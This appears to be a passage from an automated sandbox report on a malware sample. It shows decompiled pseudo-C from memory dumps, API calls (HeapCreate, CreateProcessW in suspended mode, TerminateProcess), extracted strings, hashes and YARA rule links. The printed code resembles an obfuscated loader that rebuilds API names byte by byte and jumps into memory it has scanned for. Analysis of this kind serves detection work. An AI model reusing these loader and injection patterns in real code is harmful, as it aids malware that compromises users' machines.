				void* _t22;
				void* _t23;
				intOrPtr* _t24;
				void* _t25;
				void* _t28;
				int _t37;
				int _t39;
				signed int _t40;
				int _t41;
				void* _t46;
				void* _t49;
				char* _t50;
				signed int _t51;
				signed int _t55;
				void* _t62;

				_pop(_t41);
				_t37 = _t41;
				_push(0);
				_push(0);
				_push(0);
				 *_t50 = 0x48;
				asm("paddw xmm2, xmm1");
				 *(_t50 + 1) = 0x65;
				_push(__eax);
				_pop(_t16);
				 *((char*)(_t50 + 2)) = 0x61;
				 *((char*)(_t50 + 3)) = 0x70;
				_t18 = _t16;
				 *((char*)(_t50 + 4)) = 0x43;
				 *((char*)(_t50 + 5)) = 0x72;
				_t20 = _t18;
				 *((char*)(_t50 + 6)) = 0x65;
				 *((char*)(_t50 + 7)) = 0x61;
				_push(__esi);
				_pop(_t46);
				 *((char*)(_t50 + 8)) = 0x74;
				_t51 = _t50 + 1;
				_t21 = _t20 & 0x00000008;
				if(_t21 == 0) {
					asm("cld");
					_pop(ds);
					 *_t21 = _t21 +  *_t21;
					__eflags =  *_t21;
					_t22 = memcpy(_t21, _t46, _t37);
					_t51 = _t51 + 0xc;
					_t41 = _t46 + _t37 + _t37;
					_t39 = _t37;
					do {
						_t22 = E0041C3C0(_t22, _t39, _t46, 0);
					} while (__eflags >= 0);
					goto __eax;
				}
				_t55 = _t21 << 1;
				 *((char*)(_t51 + 9)) = 0x65;
				 *(_t49 - 0x70) =  *(_t49 - 0x70) | _t51;
				_t40 = _t51;
				L9();
				 *_t51 =  *_t51 + 0x44fff; // executed
				_t28 = HeapCreate(1, 0, 0); // executed
				 *(_t49 + 8) = _t28;
				_t39 = _t41;
				_t23 = L0041C326(__ebx, _t39, _t41, _t46, _t55, _t62);
				_push(_t23);
				_t24 = _t23 - 1;
				asm("popad");
				if(_t24 >= 0) {
					asm("insb");
					asm("insb");
					asm("outsd");
					asm("arpl [eax], ax");
					do {
						asm("lodsd");
					} while (_t24 == 0 ||  *_t24 != 0xffffffff83ec8b55 ||  *((intOrPtr*)(_t24 + 4)) != 0xffffffff8d560cec);
					 *_t51 =  *_t51 + 0x44ffe;
					_t25 =  *_t24(_t51, _t39, _t40, 2, _t51, 0, 0, 0); // executed
					return _t25;
				}
				return _t24;
			}

APIs

HeapCreate.KERNELBASE ref: 0041C31D

Strings

t, xrefs: 0041C2FA
a, xrefs: 0041C2F1
e, xrefs: 0041C303
e, xrefs: 0041C2EB
C, xrefs: 0041C2DC
e, xrefs: 0041C2C4
p, xrefs: 0041C2D3
ZBH, xrefs: 0041C365
r, xrefs: 0041C2E2
a, xrefs: 0041C2CD

Memory Dump Source

Source File: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp Download File
Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID: C$ZBH$a$a$e$e$e$p$r$t
API String ID: 10892065-806109700
Opcode ID: 1e4dcb0d92532099e8bfcde6bd255666af820a14ccddb95377bfc1d5073683db
Instruction ID: 58e82dbdb3658900729ccf9ba076fd16bbbb39d88dae26d1e35245091ceddc53
Opcode Fuzzy Hash: 1e4dcb0d92532099e8bfcde6bd255666af820a14ccddb95377bfc1d5073683db
Instruction Fuzzy Hash: AC01926018D7C069F351923C8815B4BAEC91BD2704F28C84EB6D8E22C2D6F98485836F

Uniqueness

Uniqueness Score: -1.00%

Function 0041C267, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 170
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0041C267(void* __ebx, void* __edx, void* __esi) {
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t18;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				void* _t60;
				void* _t61;
				void* _t63;
				signed int _t64;
				void* _t65;
				void* _t67;
				void* _t84;
				signed int _t87;
				void* _t94;

				_t63 = __edx;
				_t49 = __ebx;
				_pop(_t60);
				L0041C26A(_t14, __ebx, _t60, __esi, _t94);
				_t16 =  *((intOrPtr*)(__ebx + 0x68))();
				asm("gs insb");
				asm("insb");
				_pop(_t65);
				_t67 = __esi - 1;
				asm("outsd");
				if(_t67 == 0) {
					 *(_t84 - 0x70) =  *(_t84 - 0x70) | _t87;
					_t64 = _t87;
					L14();
					 *_t87 =  *_t87 + 0x44fff; // executed
					_t17 = HeapCreate(1, 0, 0); // executed
					 *(_t84 + 8) = _t17;
					_t61 = _t65;
					_t18 = L0041C326(_t49, _t61, _t65, _t67, __eflags, _t94);
					_push(_t18);
					_t19 = _t18 - 1;
					__eflags = _t19;
					asm("popad");
					if(_t19 >= 0) {
						asm("insb");
						asm("insb");
						asm("outsd");
						asm("arpl [eax], ax");
						__eflags =  &__imp___CIcos;
						goto L15;
						do {
							do {
								do {
									L15:
									asm("lodsd");
									__eflags = _t19;
								} while (_t19 == 0);
								__eflags =  *_t19 - 0xffffffff83ec8b55;
							} while ( *_t19 != 0xffffffff83ec8b55);
							__eflags =  *((intOrPtr*)(_t19 + 4)) - 0xffffffff8d560cec;
						} while ( *((intOrPtr*)(_t19 + 4)) != 0xffffffff8d560cec);
						 *_t87 =  *_t87 + 0x44ffe;
						__eflags =  *_t87;
						_t20 =  *_t19(_t87, _t61, _t64, 2, _t87, 0, 0, 0); // executed
						return _t20;
					}
					return _t19;
				} else {
					asm("o16 jns 0x4c");
					asm("arpl [edi+0x6e], bp");
					 *((intOrPtr*)(_t16 - 1)) =  *((intOrPtr*)(_t16 - 1)) + __ebx;
					_t21 = _t65;
					_push( *((intOrPtr*)(_t84 + 0x52)));
				}
			}

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 0041C2AB
HeapCreate.KERNELBASE ref: 0041C31D

Strings

e, xrefs: 0041C303
KERNEL32, xrefs: 0041C3B7
ZBH, xrefs: 0041C365

Memory Dump Source

Source File: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp Download File
Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeapIconNotifyShell_
String ID: KERNEL32$ZBH$e
API String ID: 2522922933-1899473809
Opcode ID: 7427d51aef7b1708450cdbeb13e5ddfffb8de5b566c4ce4102e31af8384c4493
Instruction ID: 521c14249353ba93ce19dc54aff6b235836c95a5453462fa8e3fff2d8716eeda
Opcode Fuzzy Hash: 7427d51aef7b1708450cdbeb13e5ddfffb8de5b566c4ce4102e31af8384c4493
Instruction Fuzzy Hash: 34316EB2558A242EF620A1B42C65AEAB74CDB53364F61570BFE90D21C1CA2446C381FE

Uniqueness

Uniqueness Score: -1.00%

Function 04B20A8F, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,?), ref: 04B20AA9
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04B21A60), ref: 04B20CDB

Strings

mmandLineW, xrefs: 04B21871
ZO, xrefs: 04B21867

Memory Dump Source

Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false

Similarity

API ID: Process$CodeExitTerminate
String ID: ZO$mmandLineW
API String ID: 1523012911-2333973816
Opcode ID: ddf7c80e17f3e8fad144c310dacf584b6256b6283887b87ebc2ba230b3b64169
Instruction ID: b995944a8c035c0d58edb2d97ada325cacab7deab8ce5b24111904894e4fec0b
Opcode Fuzzy Hash: ddf7c80e17f3e8fad144c310dacf584b6256b6283887b87ebc2ba230b3b64169
Instruction Fuzzy Hash: 3821F8316006769BD718EF28C7507A9B760FF46314F1886ADD56E6B741CB34B912CF80

Uniqueness

Uniqueness Score: -1.00%

Function 04B2087C, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 249processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04B2089C

Strings

mmandLineW, xrefs: 04B21871
ZO, xrefs: 04B21867

Memory Dump Source

Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false

Similarity

API ID: CreateProcess
String ID: ZO$mmandLineW
API String ID: 963392458-2333973816
Opcode ID: 3eceb4f3697a1c5f95725fd507d957d81a4dd088abaac63583fb0849004630ba
Instruction ID: 3f6ec0b2ad371d7eaebb5ca8546b68cc278357bea3274be826e5f07fc3ff72b5
Opcode Fuzzy Hash: 3eceb4f3697a1c5f95725fd507d957d81a4dd088abaac63583fb0849004630ba
Instruction Fuzzy Hash: DD71CA321047B57BDB25BF6C8B512AABB34FF53310F1886CAD56E5B257C620B90383A5

Uniqueness

Uniqueness Score: -1.00%

Function 04B20AE4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

MOC, xrefs: 04B20B9A
csm, xrefs: 04B20BA1

Memory Dump Source

Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false

Similarity

API ID:
String ID: MOC$csm
API String ID: 0-1389381023
Opcode ID: 459aa3d9913987ae39641fc249ddc2537b967027c4a915005107ac85100968f0
Instruction ID: 6e982eaa710627f11081116fa0afaf252b9961e05b8e63f5821253bcc55dea5c
Opcode Fuzzy Hash: 459aa3d9913987ae39641fc249ddc2537b967027c4a915005107ac85100968f0
Instruction Fuzzy Hash: D4410C70344616BFEB396A28CA9DBE8B672FB0D308F144651F72CD6560C775B8A09B81

Uniqueness

Uniqueness Score: -1.00%

Function 00401188, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 326
COMMON

Download Yara Rule

C-Code - Quality: 59%

			_entry_(signed int __eax, signed int __ecx, signed int __edx, signed int __esi, intOrPtr _a43, intOrPtr _a51, intOrPtr _a55, signed int _a59, char _a64, intOrPtr _a66, signed int _a71, intOrPtr _a102, signed int _a109, char _a110, signed int _a114, intOrPtr _a65659, char _a735838272, signed int _a1092878454) {
				char _v1;
				intOrPtr _v1744814033;
				intOrPtr* _t845;
				signed char _t846;
				signed char _t847;
				void* _t848;
				intOrPtr* _t849;
				signed int _t850;
				signed int _t851;
				signed char _t852;
				signed int _t853;
				signed int _t855;
				intOrPtr* _t859;
				signed int _t860;
				intOrPtr* _t871;
				signed int _t872;
				intOrPtr* _t873;
				intOrPtr* _t874;
				intOrPtr* _t875;
				intOrPtr* _t876;
				void* _t877;
				intOrPtr* _t879;
				intOrPtr* _t880;
				intOrPtr* _t881;
				intOrPtr* _t882;
				intOrPtr* _t883;
				intOrPtr* _t884;
				intOrPtr* _t885;
				intOrPtr* _t886;
				intOrPtr* _t887;
				intOrPtr* _t888;
				intOrPtr* _t891;
				intOrPtr* _t892;
				intOrPtr* _t893;
				intOrPtr* _t894;
				intOrPtr* _t895;
				intOrPtr* _t896;
				signed char _t897;
				intOrPtr* _t900;
				intOrPtr* _t901;
				signed int _t904;
				intOrPtr* _t905;
				signed char _t906;
				void* _t907;
				signed int _t909;
				signed int _t910;
				signed char _t912;
				intOrPtr* _t915;
				intOrPtr* _t916;
				intOrPtr* _t917;
				intOrPtr* _t918;
				intOrPtr* _t919;
				intOrPtr* _t920;
				signed int _t921;
				intOrPtr* _t922;
				intOrPtr* _t923;
				intOrPtr* _t924;
				intOrPtr* _t925;
				intOrPtr* _t927;
				signed int _t928;
				intOrPtr* _t929;
				intOrPtr* _t930;
				intOrPtr* _t931;
				void* _t932;
				intOrPtr* _t934;
				intOrPtr* _t935;
				intOrPtr* _t936;
				intOrPtr* _t937;
				intOrPtr* _t938;
				intOrPtr* _t939;
				intOrPtr* _t940;
				intOrPtr* _t941;
				intOrPtr* _t942;
				intOrPtr* _t943;
				intOrPtr* _t944;
				intOrPtr* _t945;
				intOrPtr* _t949;
				intOrPtr* _t950;
				intOrPtr* _t951;
				void* _t952;
				intOrPtr* _t954;
				intOrPtr* _t955;
				intOrPtr* _t956;
				intOrPtr* _t957;
				intOrPtr* _t958;
				intOrPtr* _t959;
				intOrPtr* _t960;
				intOrPtr* _t961;
				void* _t962;
				intOrPtr* _t964;
				intOrPtr* _t965;
				intOrPtr* _t966;
				intOrPtr* _t967;
				intOrPtr* _t968;
				intOrPtr* _t970;
				intOrPtr* _t972;
				intOrPtr* _t974;
				intOrPtr* _t976;
				signed char _t978;
				intOrPtr* _t979;
				intOrPtr* _t980;
				signed char _t982;
				intOrPtr* _t983;
				void* _t984;
				intOrPtr* _t986;
				intOrPtr* _t987;
				signed int _t988;
				signed char _t989;
				intOrPtr* _t990;
				signed int _t991;
				intOrPtr* _t995;
				signed char _t996;
				intOrPtr* _t997;
				intOrPtr* _t998;
				signed int _t999;
				intOrPtr* _t1000;
				signed int _t1001;
				signed int _t1003;
				intOrPtr* _t1004;
				signed char _t1005;
				void* _t1007;
				intOrPtr* _t1009;
				intOrPtr* _t1010;
				intOrPtr* _t1011;
				signed char _t1013;
				intOrPtr* _t1016;
				intOrPtr* _t1017;
				signed int _t1018;
				signed int _t1019;
				signed char _t1020;
				signed int _t1040;
				signed int _t1041;
				signed int _t1042;
				intOrPtr* _t1044;
				intOrPtr* _t1045;
				signed char _t1046;
				intOrPtr* _t1059;
				intOrPtr* _t1060;
				intOrPtr* _t1061;
				intOrPtr* _t1062;
				intOrPtr* _t1063;
				intOrPtr* _t1067;
				intOrPtr* _t1068;
				signed char _t1069;
				intOrPtr* _t1073;
				intOrPtr* _t1074;
				intOrPtr* _t1075;
				signed int _t1077;
				intOrPtr* _t1078;
				intOrPtr* _t1079;
				signed char _t1080;
				signed char _t1081;
				signed int _t1083;
				signed int _t1084;
				intOrPtr* _t1085;
				intOrPtr* _t1086;
				void* _t1087;
				intOrPtr* _t1089;
				intOrPtr* _t1090;
				signed char _t1091;
				intOrPtr* _t1092;
				intOrPtr* _t1093;
				intOrPtr* _t1094;
				intOrPtr* _t1095;
				signed char _t1096;
				intOrPtr* _t1098;
				intOrPtr* _t1100;
				intOrPtr* _t1102;
				intOrPtr* _t1106;
				intOrPtr* _t1108;
				intOrPtr* _t1109;
				intOrPtr* _t1112;
				intOrPtr* _t1113;
				intOrPtr* _t1115;
				intOrPtr* _t1116;
				void* _t1117;
				intOrPtr* _t1119;
				void* _t1120;
				intOrPtr* _t1122;
				intOrPtr* _t1126;
				void* _t1127;
				intOrPtr* _t1129;
				void* _t1130;
				intOrPtr* _t1132;
				intOrPtr* _t1136;
				signed int _t1138;
				intOrPtr* _t1143;
				intOrPtr* _t1144;
				intOrPtr* _t1149;
				intOrPtr* _t1150;
				intOrPtr* _t1151;
				intOrPtr* _t1152;
				intOrPtr* _t1153;
				signed char _t1155;
				intOrPtr* _t1157;
				void* _t1160;
				intOrPtr* _t1165;
				intOrPtr* _t1166;
				intOrPtr* _t1167;
				intOrPtr* _t1168;
				intOrPtr* _t1169;
				intOrPtr* _t1171;
				signed char _t1183;
				signed char _t1184;
				signed int _t1186;
				void* _t1187;
				intOrPtr* _t1192;
				void* _t1193;
				void* _t1194;
				void* _t1195;
				void* _t1196;
				void* _t1197;
				void* _t1198;
				void* _t1200;
				void* _t1201;
				void* _t1206;
				signed char* _t1207;
				intOrPtr* _t1213;
				intOrPtr* _t1214;
				signed int* _t1218;
				signed int _t1219;
				signed int* _t1220;
				intOrPtr* _t1221;
				signed char _t1227;
				void* _t1228;
				void* _t1229;
				void* _t1230;
				signed int* _t1231;
				void* _t1232;
				signed char _t1233;
				void* _t1234;
				void* _t1235;
				void* _t1236;
				intOrPtr* _t1237;
				void* _t1238;
				void* _t1240;
				void* _t1241;
				void* _t1242;
				void* _t1243;
				void* _t1244;
				intOrPtr* _t1245;
				void* _t1246;
				void* _t1247;
				void* _t1248;
				void* _t1249;
				intOrPtr* _t1250;
				void* _t1251;
				void* _t1252;
				signed int* _t1253;
				signed int* _t1254;
				signed int* _t1255;
				intOrPtr* _t1256;
				void* _t1257;
				signed int _t1258;
				void* _t1259;
				void* _t1260;
				intOrPtr* _t1262;
				void* _t1263;
				void* _t1264;
				signed int* _t1266;
				signed int* _t1267;
				signed int* _t1268;
				intOrPtr* _t1269;
				signed int* _t1270;
				signed int _t1276;
				signed int _t1277;
				intOrPtr* _t1278;
				signed int _t1280;
				char* _t1281;
				void* _t1285;
				signed int _t1286;
				intOrPtr* _t1287;
				intOrPtr* _t1288;
				intOrPtr* _t1289;
				void* _t1290;
				signed char _t1291;
				intOrPtr* _t1292;
				intOrPtr* _t1293;
				intOrPtr* _t1294;
				intOrPtr* _t1295;
				intOrPtr* _t1296;
				intOrPtr* _t1297;
				signed char _t1298;
				signed int _t1300;
				signed char _t1305;
				intOrPtr* _t1306;
				void* _t1309;
				intOrPtr _t1310;
				intOrPtr _t1317;
				intOrPtr _t1318;
				intOrPtr _t1322;
				intOrPtr _t1323;
				intOrPtr _t1429;
				intOrPtr _t1449;

				_t1276 = __esi;
				_push("VB5!6&*"); // executed
				L00401182(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t845 = __eax + 1;
				 *_t845 =  *_t845 + _t845;
				 *_t845 =  *_t845 + _t845;
				 *_t845 =  *_t845 + _t845;
				 *((intOrPtr*)(_t1285 + __ecx * 8)) =  *((intOrPtr*)(_t1285 + __ecx * 8)) + _t845;
				_t846 = _t845 + 0xcc;
				_t1227 = __edx & __ecx;
				asm("in al, 0xc4");
				asm("fisttp word [eax-0x7c]");
				_t1218 = __ecx + _t1280;
				asm("adc [ecx+0x9], edx");
				 *_t846 =  *_t846 + _t846;
				 *_t1218 =  *_t1218 + _t846;
				 *_t846 =  *_t846 + _t846;
				 *_t846 =  *_t846 + _t846;
				 *((intOrPtr*)(_t846 + _t846)) =  *((intOrPtr*)(_t846 + _t846)) + _t846;
				 *_t846 =  *_t846 + _t846;
				_push(_t1184);
				if( *_t846 != 0) {
					_t1280 =  *(_t1184 + 0x76) * 0x31657261;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 ^ _t846;
					asm("adc al, 0x4d");
					asm("cmc");
					asm("sbb al, 0x16");
					 *((intOrPtr*)(_t1184 + 8)) =  *((intOrPtr*)(_t1184 + 8)) - 1;
					asm("arpl di, si");
					_push(_t1270);
					asm("in eax, dx");
					asm("lahf");
					asm("lodsd");
					_t1183 = _t1285 - 1;
					asm("stosb");
					 *((intOrPtr*)(_t1183 - 0x2d)) =  *((intOrPtr*)(_t1183 - 0x2d)) + _t1183;
					_t846 = _t1184 ^  *(_t1218 - 0x48ee309a);
					_t1184 = _t1183;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					_t1270 =  *(__esi + 0x3a);
					 *_t846 =  *_t846 + _t846;
					 *_t1184 =  *_t1184 + _t846;
					 *_t846 =  *_t846 + _t846;
				}
				 *_t1218 = _t1218 +  *_t1218;
				_t1218[0x1c] = _t1218[0x1c] + _t846;
				asm("a16 jnz 0x69");
				_t1286 = _a114 * 0x10d0073;
				_push(es);
				_t19 = _t846 + 0x65;
				 *_t19 =  *((intOrPtr*)(_t846 + 0x65)) + _t1218;
				_t1317 =  *_t19;
				if(_t1317 < 0) {
					L11:
					if (_t1322 >= 0) goto L12;
					 *_t846 =  *_t846 ^ _t846;
					asm("adc eax, [eax]");
					 *_t1276 =  *_t1276 + _t1227;
					 *_t1270 =  *_t1270 + _t1227;
					 *_t846 =  *_t846 + _t1184;
					 *_t846 =  *_t846 + _t846;
					asm("sbb [edi], ecx");
					_t38 =  &_a110;
					 *_t38 = _a110 + _t1227;
					_t1323 =  *_t38;
					goto L13;
				} else {
					if(_t1317 >= 0) {
						L8:
						_t1218 =  &(_t1218[0]);
						asm("outsb");
						if(_t1218 == 0) {
							goto L15;
						} else {
							asm("insb");
							asm("popad");
							asm("bound ebp, [ecx+0x75]");
							asm("insd");
							 *0x3113ea02 =  *0x3113ea02 + _t846;
							 *(_t1276 + 0xc) =  *(_t1276 + 0xc) | _t1286;
							goto L10;
						}
					} else {
						 *_t1218 =  *_t1218 + _t1184;
						 *_t846 =  *_t846 + _t846;
						_t1227 = _t1227 + 1;
						 *_t1227 =  *_t1227 + _t846;
						_t1286 = _t1286 +  *((intOrPtr*)(_t1276 + _t846));
						_t22 = _t846 + 0x65;
						 *_t22 =  *((intOrPtr*)(_t846 + 0x65)) + _t1218;
						_t1318 =  *_t22;
						if(_t1318 < 0) {
							L13:
							_push(_t1280);
							asm("outsb");
							if(_t1323 < 0) {
								L18:
								 *_t846 =  *_t846 + _t846;
								 *_t1184 =  *_t1184 + 1;
								_t847 = _t846;
								 *_t847 =  *_t847 + _t847;
								_t848 = _t847 + 0xc;
								_t50 = _t1184 + 0x6c;
								 *_t50 =  *((intOrPtr*)(_t1184 + 0x6c)) + _t1227;
								asm("a16 jz 0x76");
								asm("bound ebp, [edi+0x67]");
								asm("gs outsb");
								if( *_t50 >= 0) {
									 *(_t1227 + 0x20b02) =  *(_t1227 + 0x20b02) | _t1184;
									 *_t1227 =  *_t1227 + 1;
									_t849 = _t848 + 6;
									 *_t849 =  *_t849 + _t849;
									_t850 = _t849 + _t1184;
									goto L27;
								} else {
									 *_t1227 =  *_t1227 + _t848;
									_t852 = _t848 + 0x29;
									_t1218 = _t1218 +  *0xef13740c;
									asm("adc [ebx], cl");
									_push(es);
									_t52 = _t1184 + 0x65;
									 *_t52 =  *((intOrPtr*)(_t1184 + 0x65)) + _t852;
									if ( *_t52 < 0) goto L28;
									goto L20;
								}
							} else {
								asm("outsb");
								asm("outsb");
								_t1280 =  *(_t1276 + 0x67) * 0x31736e65;
								 *_t1184 =  *_t1184 + _t1184;
								 *_t846 =  *_t846 + _t846;
								_t852 = _t846 & 0x2d022c01;
								_t1184 = _t1184 + _t1184;
								_t1286 = _t1286 +  *_t1227;
								 *_t852 =  *_t852 + _t852;
								 *_t1227 =  *_t1227 + _t852;
								_push(cs);
								 *((intOrPtr*)(_t1184 + 0x6f)) =  *((intOrPtr*)(_t1184 + 0x6f)) + _t1218;
								asm("insb");
								asm("insb");
								L15:
								asm("popad");
								asm("bound ebp, [edi+0x72]");
								if(_t1323 < 0) {
									L20:
									asm("arpl [ebp], bp");
								} else {
									asm("outsb");
									 *[gs:ebx] =  *[gs:ebx] + _t1218;
									_pop(es);
									goto 0x840130e;
									 *_t852 =  *_t852 | _t852;
									_t1184 = _t1184 + _t1184;
									_t1280 =  &_v1 +  *_t1270;
									 *_t852 =  *_t852 + _t852;
									 *_t1184 =  *_t1184 + _t852;
									_t850 = _t852 |  *_t852;
									_push(_t1184);
									_t1276 = _a109 * 0x70;
									asm("insb");
									asm("popad");
									if(_t1276 >= 0) {
										L27:
										 *_t1270 =  *_t1270 + _t850;
										 *_t850 =  *_t850 + _t850;
										 *_t850 =  *_t850 + _t850;
										 *_t1270 =  *_t1270 + _t850;
										 *_t850 =  *_t850 + _t850;
										_t851 = _t850 + _t1227;
										_push(_t1276);
										_t1227 = _t1227 + 1;
										_t852 = _t851 ^ 0x2a263621;
										 *_t852 =  *_t852 + _t852;
										 *_t852 =  *_t852 + _t852;
										 *_t852 =  *_t852 + _t852;
										 *_t852 =  *_t852 + _t852;
										 *_t852 =  *_t852 + _t852;
										 *_t852 =  *_t852 + _t852;
										 *_t1276 =  *_t1276 + _t1184;
										 *_t852 =  *_t852 + _t852;
										 *_t852 =  *_t852 + _t852;
										 *_t852 =  *_t852 + _t852;
										 *_t852 =  *_t852 + _t852;
										 *_t852 =  *_t852 + _t852;
										 *_t852 =  *_t852 + _t852;
										 *_t1227 = _t1218 +  *_t1227;
										 *_t1218 = _t1218 +  *_t1218;
										_t853 = _t852;
										 *_t853 =  *_t853 + _t853;
										 *_t853 =  *_t853 + _t853;
										 *_t853 =  *_t853 + _t853;
										 *_t853 =  *_t853 + _t853;
										 *((intOrPtr*)(_t853 + 0x44004029)) =  *((intOrPtr*)(_t853 + 0x44004029)) + _t853;
										asm("clc");
										 *_t1218 =  *_t1218 ^ _t853;
										 *_t853 =  *_t853 + _t1286;
										asm("invalid");
										 *_t853 =  *_t853 - 1;
										 *_t853 =  *_t853 + _t853;
										 *_t1218 =  *_t1218 + _t853;
										 *_t853 =  *_t853 + _t853;
										 *_t1227 =  *_t1227 + _t1227;
										 *_t853 =  *_t853 + _t853;
									} else {
										_push(es);
										 *_t1184 =  *_t1184 + _t1218;
										_a102 = _a102 + _t1218;
										_t1280 =  *(_t1276 + 0x64) * 0x67696c74;
										_t846 = _t1227;
										_t1227 = (_t850 ^  *_t850) + 0x1251369;
										 *(_t1276 + 0x120a) =  *(_t1276 + 0x120a) | _t846;
										goto L18;
									}
								}
							}
						} else {
							if(_t1318 >= 0) {
								L10:
								asm("o16 or al, 0xaf");
								asm("adc dl, [edx]");
								asm("lldt word [ebp]");
								asm("outsb");
								 *((intOrPtr*)(_t846 + _t846 + 0x65)) =  *((intOrPtr*)(_t846 + _t846 + 0x65)) + _t846;
								 *_t1227 =  *_t1227 + _t1227;
								 *[fs:esi] =  *[fs:esi] + _t1218;
								asm("outsb");
								 *_t1218 = _t1218 +  *_t1218;
								asm("outsb");
								 *_t1270 =  *_t1270 + _t846;
								 *[gs:esi] =  *[gs:esi] + _t1218;
								_t1322 =  *[gs:esi];
								goto L11;
							} else {
								 *0 =  *0 + _t1227;
								 *_t846 =  *_t846 + _t846;
								 *_t846 =  *_t846 + _t846;
								asm("lock or [eax], eax");
								 *(_t1218 + _t1218) =  *(_t1218 + _t1218) + _t846;
								 *((intOrPtr*)(_t846 + _t846 + 0x46)) =  *((intOrPtr*)(_t846 + _t846 + 0x46)) + _t846;
								_t1270 = _t1270 + _t1270;
								 *((intOrPtr*)(_t846 + _t846)) =  *((intOrPtr*)(_t846 + _t846)) + _t1286;
								 *_t1218 =  *_t1218 + _t846;
								_t852 = _t846 |  *_t846;
								goto L8;
							}
						}
					}
				}
				_t1219 = _t1218 + _t1218;
				 *_t853 =  *_t853 + _t853;
				asm("das");
				_t855 = _t853 + _t853 + 1;
				_t58 = _t855 - 0x6bffbfed;
				 *_t58 =  *((intOrPtr*)(_t855 - 0x6bffbfed)) + _t855;
				asm("adc [eax], eax");
				if ( *_t58 < 0) goto L32;
				 *_t855 =  *_t855 + _t855;
				 *_t855 =  *_t855;
				 *((intOrPtr*)(_t855 + _t855 + 0x8d0000)) =  *((intOrPtr*)(_t855 + _t855 + 0x8d0000)) + _t1219;
				 *_t855 =  *_t855 + _t855;
				 *_t855 =  *_t855 + _t855;
				 *_t855 =  *_t855 + _t855;
				 *_t855 =  *_t855 + _t855;
				 *_t855 =  *_t855 + _t855;
				 *_t855 =  *_t855 + _t855;
				 *_t855 =  *_t855 + _t855;
				 *_t855 =  *_t855 + _t855;
				 *_t855 =  *_t855 + _t855;
				_push(_t1286);
				asm("outsd");
				_push(0x6769646e);
				if( *_t855 >= 0) {
					L36:
					 *_t855 =  *_t855 + _t855;
					 *_t855 =  *_t855 + _t855;
					_t71 = _t855 + 0x48;
					 *_t71 =  *((intOrPtr*)(_t855 + 0x48)) + _t1219;
					if ( *_t71 >= 0) goto L37;
					 *_t855 =  *_t855 + _t855;
					 *_t855 =  *_t855 + _t855;
					 *_t855 =  *_t855 + _t855;
					 *_t855 =  *_t855 + _t855;
					 *_t855 =  *_t855 + _t855;
					 *_t855 =  *_t855 + _t855;
					_t855 = _t855 + 1;
					 *_t1219 =  *_t1219 + _t855;
					 *_t855 =  *_t855 + _t855;
					 *((intOrPtr*)(_t855 + 0x403d)) =  *((intOrPtr*)(_t855 + 0x403d)) + _t1219;
					 *_t855 =  *_t855 + _t855;
					 *((intOrPtr*)(_t855 + 0x1004014)) =  *((intOrPtr*)(_t855 + 0x1004014)) + _t1219;
					 *_t855 =  *_t855 + _t855;
					 *((intOrPtr*)(_t855 + 0x4014)) =  *((intOrPtr*)(_t855 + 0x4014)) + _t1227;
					 *_t855 =  *_t855 + _t855;
					 *((intOrPtr*)(_t1286 + _t1227 + 0x10040)) =  *((intOrPtr*)(_t1286 + _t1227 + 0x10040)) + _t1219;
					goto L38;
				} else {
					_t64 = _t1276 + 0x79;
					 *_t64 =  *((intOrPtr*)(_t1276 + 0x79)) + _t855;
					if( *_t64 < 0) {
						L38:
